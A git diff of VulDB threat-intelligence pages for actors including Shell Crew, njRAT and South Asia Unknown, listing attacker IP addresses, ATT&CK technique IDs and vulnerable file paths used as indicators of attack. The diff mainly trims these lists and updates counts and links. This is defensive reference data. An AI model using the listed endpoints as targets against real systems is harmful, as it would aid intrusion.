The indicators are related to [VulDB CTI analysis](https://vuldb.com/?kb.cti) of the actor known as [Shell Crew](https://vuldb.com/?actor.shell_crew). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
|
||||
|
||||
Live data and more analysis capabilities are available at [https://vuldb.com/?actor.shell_crew](https://vuldb.com/?actor.shell_crew)
|
||||
|
||||
|
@ -21,12 +21,9 @@ ID | IP address | Hostname | Confidence
|
|||
2 | 43.249.81.210 | - | High
|
||||
3 | 50.115.138.215 | 50-115-138-215.genericreverse.com | High
|
||||
4 | 92.242.144.2 | - | High
|
||||
5 | 118.193.153.5 | - | High
|
||||
6 | 119.57.196.30 | - | High
|
||||
7 | 122.10.9.154 | - | High
|
||||
8 | ... | ... | ...
|
||||
5 | ... | ... | ...
|
||||
|
||||
There are 12 more IOC items available. Please use our online service to access the data.
|
||||
There are 15 more IOC items available. Please use our online service to access the data.
|
||||
|
||||
## TTP - Tactics, Techniques, Procedures
|
||||
|
||||
|
@ -46,10 +43,9 @@ ID | Type | Indicator | Confidence
|
|||
1 | File | `fs/aio.c` | Medium
|
||||
2 | File | `index.php?mod=main&opt=personal` | High
|
||||
3 | File | `pkg/tool/path.go` | High
|
||||
4 | File | `receiver.c` | Medium
|
||||
5 | File | `routes/api/v1/api.go` | High
|
||||
6 | Argument | `avatar_file` | Medium
|
||||
7 | Argument | `m1_idlist` | Medium
|
||||
4 | ... | ... | ...
|
||||
|
||||
There are 4 more IOA items available. Please use our online service to access the data.
|
||||
|
||||
## References
|
||||
|
||||
|
@ -62,9 +58,9 @@ The following list contains external sources which discuss the actor and the ass
|
|||
|
||||
The following articles explain our unique predictive cyber threat intelligence:
|
||||
|
||||
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?doc.cti)
|
||||
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?kb.cti)
|
||||
* [Cyber Threat Intelligence - Early Anticipation of Attacks](https://www.scip.ch/en/?labs.20201022)
|
||||
|
||||
## License
|
||||
|
||||
(c) [1997-2021](https://vuldb.com/?doc.changelog) by [vuldb.com](https://vuldb.com/?doc.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?doc.faq), read the [documentation](https://vuldb.com/?doc) or [contact us](https://vuldb.com/?contact)!
|
||||
(c) [1997-2022](https://vuldb.com/?kb.changelog) by [vuldb.com](https://vuldb.com/?kb.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?kb.faq), read the [documentation](https://vuldb.com/?kb) or [contact us](https://vuldb.com/?contact)!
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
# South Asia Unknown - Cyber Threat Intelligence
|
||||
|
||||
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?doc.cti) of the actor known as [South Asia Unknown](https://vuldb.com/?actor.south_asia_unknown). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
|
||||
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?kb.cti) of the actor known as [South Asia Unknown](https://vuldb.com/?actor.south_asia_unknown). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
|
||||
|
||||
Live data and more analysis capabilities are available at [https://vuldb.com/?actor.south_asia_unknown](https://vuldb.com/?actor.south_asia_unknown)
|
||||
|
||||
|
@ -21,7 +21,7 @@ These indicators of compromise indicate associated network ressources which are
|
|||
|
||||
ID | IP address | Hostname | Confidence
|
||||
-- | ---------- | -------- | ----------
|
||||
1 | 91.92.136.239 | - | High
|
||||
1 | 91.92.136.239 | osca.gotdns.ch | High
|
||||
2 | 139.28.38.231 | 139.28.38.231.deltahost-ptr | High
|
||||
3 | 139.28.38.236 | 139.28.38.236.deltahost-ptr | High
|
||||
4 | ... | ... | ...
|
||||
|
@ -51,15 +51,9 @@ ID | Type | Indicator | Confidence
|
|||
2 | File | `/uncpath/` | Medium
|
||||
3 | File | `category.php` | Medium
|
||||
4 | File | `classified_right.php` | High
|
||||
5 | File | `courier/1000@/oauth/playground/callback.html` | High
|
||||
6 | File | `data/gbconfiguration.dat` | High
|
||||
7 | File | `Form2File.htm` | High
|
||||
8 | File | `home/seos/courier/web/wmProgressstat.html.php` | High
|
||||
9 | File | `html/install.php` | High
|
||||
10 | File | `index.php` | Medium
|
||||
11 | ... | ... | ...
|
||||
5 | ... | ... | ...
|
||||
|
||||
There are 27 more IOA items available. Please use our online service to access the data.
|
||||
There are 33 more IOA items available. Please use our online service to access the data.
|
||||
|
||||
## References
|
||||
|
||||
|
@ -71,9 +65,9 @@ The following list contains external sources which discuss the actor and the ass
|
|||
|
||||
The following articles explain our unique predictive cyber threat intelligence:
|
||||
|
||||
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?doc.cti)
|
||||
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?kb.cti)
|
||||
* [Cyber Threat Intelligence - Early Anticipation of Attacks](https://www.scip.ch/en/?labs.20201022)
|
||||
|
||||
## License
|
||||
|
||||
(c) [1997-2021](https://vuldb.com/?doc.changelog) by [vuldb.com](https://vuldb.com/?doc.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?doc.faq), read the [documentation](https://vuldb.com/?doc) or [contact us](https://vuldb.com/?contact)!
|
||||
(c) [1997-2022](https://vuldb.com/?kb.changelog) by [vuldb.com](https://vuldb.com/?kb.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?kb.faq), read the [documentation](https://vuldb.com/?kb) or [contact us](https://vuldb.com/?contact)!
|
||||
|
|
|
@ -34,14 +34,9 @@ ID | IP address | Hostname | Confidence
|
|||
5 | 43.128.232.152 | - | High
|
||||
6 | 43.129.239.78 | - | High
|
||||
7 | 43.133.160.144 | - | High
|
||||
8 | 45.95.11.151 | vm220095.pq.hosting | High
|
||||
9 | 45.95.11.153 | vm284420.pq.hosting | High
|
||||
10 | 45.95.11.154 | l-universe.com | High
|
||||
11 | 45.95.11.155 | kuhtin.com | High
|
||||
12 | 45.95.11.157 | mail.hottiesforums.com | High
|
||||
13 | ... | ... | ...
|
||||
8 | ... | ... | ...
|
||||
|
||||
There are 24 more IOC items available. Please use our online service to access the data.
|
||||
There are 29 more IOC items available. Please use our online service to access the data.
|
||||
|
||||
## TTP - Tactics, Techniques, Procedures
|
||||
|
||||
|
@ -71,10 +66,9 @@ ID | Type | Indicator | Confidence
|
|||
7 | File | `/uncpath/` | Medium
|
||||
8 | File | `adclick.php` | Medium
|
||||
9 | File | `admin/getparam.cgi` | High
|
||||
10 | File | `admin/infoclass_update.php` | High
|
||||
11 | ... | ... | ...
|
||||
10 | ... | ... | ...
|
||||
|
||||
There are 71 more IOA items available. Please use our online service to access the data.
|
||||
There are 72 more IOA items available. Please use our online service to access the data.
|
||||
|
||||
## References
|
||||
|
||||
|
@ -93,4 +87,4 @@ The following articles explain our unique predictive cyber threat intelligence:
|
|||
|
||||
## License
|
||||
|
||||
(c) [1997-2021](https://vuldb.com/?kb.changelog) by [vuldb.com](https://vuldb.com/?kb.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?kb.faq), read the [documentation](https://vuldb.com/?kb) or [contact us](https://vuldb.com/?contact)!
|
||||
(c) [1997-2022](https://vuldb.com/?kb.changelog) by [vuldb.com](https://vuldb.com/?kb.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?kb.faq), read the [documentation](https://vuldb.com/?kb) or [contact us](https://vuldb.com/?contact)!
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
# njRAT - Cyber Threat Intelligence
|
||||
|
||||
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?doc.cti) of the actor known as [njRAT](https://vuldb.com/?actor.njrat). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
|
||||
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?kb.cti) of the actor known as [njRAT](https://vuldb.com/?actor.njrat). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
|
||||
|
||||
Live data and more analysis capabilities are available at [https://vuldb.com/?actor.njrat](https://vuldb.com/?actor.njrat)
|
||||
|
||||
|
@ -13,7 +13,7 @@ These countries are directly (e.g. origin of attacks) or indirectly (e.g. access
|
|||
* FR
|
||||
* ...
|
||||
|
||||
There are 1 more country items available. Please use our online service to access the data.
|
||||
There are 2 more country items available. Please use our online service to access the data.
|
||||
|
||||
## IOC - Indicator of Compromise
|
||||
|
||||
|
@ -24,12 +24,9 @@ ID | IP address | Hostname | Confidence
|
|||
1 | 23.3.13.88 | a23-3-13-88.deploy.static.akamaitechnologies.com | High
|
||||
2 | 23.3.13.154 | a23-3-13-154.deploy.static.akamaitechnologies.com | High
|
||||
3 | 41.200.44.39 | - | High
|
||||
4 | 41.200.143.212 | - | High
|
||||
5 | 46.243.150.150 | - | High
|
||||
6 | 52.128.23.153 | - | High
|
||||
7 | ... | ... | ...
|
||||
4 | ... | ... | ...
|
||||
|
||||
There are 10 more IOC items available. Please use our online service to access the data.
|
||||
There are 13 more IOC items available. Please use our online service to access the data.
|
||||
|
||||
## TTP - Tactics, Techniques, Procedures
|
||||
|
||||
|
@ -40,6 +37,9 @@ ID | Technique | Description | Confidence
|
|||
1 | T1059.007 | Cross Site Scripting | High
|
||||
2 | T1068 | Execution with Unnecessary Privileges | High
|
||||
3 | T1211 | 7PK Security Features | High
|
||||
4 | ... | ... | ...
|
||||
|
||||
There are 2 more TTP items available. Please use our online service to access the data.
|
||||
|
||||
## IOA - Indicator of Attack
|
||||
|
||||
|
@ -47,19 +47,13 @@ These indicators of attack list the potential fragments used for technical activ
|
|||
|
||||
ID | Type | Indicator | Confidence
|
||||
-- | ---- | --------- | ----------
|
||||
1 | File | `books.php` | Medium
|
||||
2 | File | `data/gbconfiguration.dat` | High
|
||||
3 | File | `devices.inc.php` | High
|
||||
4 | File | `ecrire/inc/filtres.php` | High
|
||||
5 | File | `goform/AdvSetDns?GO=wan_dns.asp` | High
|
||||
6 | File | `guestbook.cgi` | High
|
||||
7 | File | `html/config` | Medium
|
||||
8 | File | `inc/config.php` | High
|
||||
9 | File | `index.js` | Medium
|
||||
10 | File | `index.php` | Medium
|
||||
11 | ... | ... | ...
|
||||
1 | File | `/uncpath/` | Medium
|
||||
2 | File | `/var/log/nginx` | High
|
||||
3 | File | `books.php` | Medium
|
||||
4 | File | `data/gbconfiguration.dat` | High
|
||||
5 | ... | ... | ...
|
||||
|
||||
There are 18 more IOA items available. Please use our online service to access the data.
|
||||
There are 28 more IOA items available. Please use our online service to access the data.
|
||||
|
||||
## References
|
||||
|
||||
|
@ -75,9 +69,9 @@ The following list contains external sources which discuss the actor and the ass
|
|||
|
||||
The following articles explain our unique predictive cyber threat intelligence:
|
||||
|
||||
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?doc.cti)
|
||||
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?kb.cti)
|
||||
* [Cyber Threat Intelligence - Early Anticipation of Attacks](https://www.scip.ch/en/?labs.20201022)
|
||||
|
||||
## License
|
||||
|
||||
(c) [1997-2021](https://vuldb.com/?doc.changelog) by [vuldb.com](https://vuldb.com/?doc.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?doc.faq), read the [documentation](https://vuldb.com/?doc) or [contact us](https://vuldb.com/?contact)!
|
||||
(c) [1997-2022](https://vuldb.com/?kb.changelog) by [vuldb.com](https://vuldb.com/?kb.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?kb.faq), read the [documentation](https://vuldb.com/?kb) or [contact us](https://vuldb.com/?contact)!
|
||||
|
|
|
@ -87,31 +87,31 @@ ID | Type | Indicator | Confidence
|
|||
28 | File | `/uncpath/` | Medium
|
||||
29 | File | `/Upload/admin/index.php?module=forum-management&action=add` | High
|
||||
30 | File | `/uploads/dede` | High
|
||||
31 | File | `/var/log/messages` | High
|
||||
32 | File | `/WEB-INF/web.xml` | High
|
||||
33 | File | `/webman/info.cgi` | High
|
||||
34 | File | `/wp-json/wc/v3/webhooks` | High
|
||||
35 | File | `/_next` | Low
|
||||
36 | File | `AccessPoint.aspx` | High
|
||||
37 | File | `actions.hsp` | Medium
|
||||
38 | File | `activateuser.aspx` | High
|
||||
39 | File | `AdHocQuery_Processor.aspx` | High
|
||||
40 | File | `admin.asp` | Medium
|
||||
41 | File | `admin.php?m=admin&c=site&a=save` | High
|
||||
42 | File | `admin/admin.asp` | High
|
||||
43 | File | `admin/backupdb.php` | High
|
||||
44 | File | `admin/bitrix.mpbuilder_step2.php` | High
|
||||
45 | File | `admin/bitrix.xscan_worker.php` | High
|
||||
46 | File | `admin/gb-dashboard-widget.php` | High
|
||||
47 | File | `admin/images.aspx` | High
|
||||
48 | File | `admin/login.asp` | High
|
||||
49 | File | `admin/mcart_xls_import.php` | High
|
||||
50 | File | `admin/modules/tools/ip_history_logs.php` | High
|
||||
51 | File | `admin/orion.extfeedbackform_efbf_forms.php` | High
|
||||
52 | File | `admin/ueditor/uploadFile` | High
|
||||
31 | File | `/usr/bin/pkexec` | High
|
||||
32 | File | `/var/log/messages` | High
|
||||
33 | File | `/WEB-INF/web.xml` | High
|
||||
34 | File | `/webman/info.cgi` | High
|
||||
35 | File | `/wp-json/wc/v3/webhooks` | High
|
||||
36 | File | `/_next` | Low
|
||||
37 | File | `AccessPoint.aspx` | High
|
||||
38 | File | `actions.hsp` | Medium
|
||||
39 | File | `activateuser.aspx` | High
|
||||
40 | File | `AdHocQuery_Processor.aspx` | High
|
||||
41 | File | `admin.asp` | Medium
|
||||
42 | File | `admin.php?m=admin&c=site&a=save` | High
|
||||
43 | File | `admin/admin.asp` | High
|
||||
44 | File | `admin/backupdb.php` | High
|
||||
45 | File | `admin/bitrix.mpbuilder_step2.php` | High
|
||||
46 | File | `admin/bitrix.xscan_worker.php` | High
|
||||
47 | File | `admin/gb-dashboard-widget.php` | High
|
||||
48 | File | `admin/images.aspx` | High
|
||||
49 | File | `admin/login.asp` | High
|
||||
50 | File | `admin/mcart_xls_import.php` | High
|
||||
51 | File | `admin/modules/tools/ip_history_logs.php` | High
|
||||
52 | File | `admin/orion.extfeedbackform_efbf_forms.php` | High
|
||||
53 | ... | ... | ...
|
||||
|
||||
There are 458 more IOA items available. Please use our online service to access the data.
|
||||
There are 459 more IOA items available. Please use our online service to access the data.
|
||||
|
||||
## References
|
||||
|
||||
|
|
Loading…
Reference in New Issue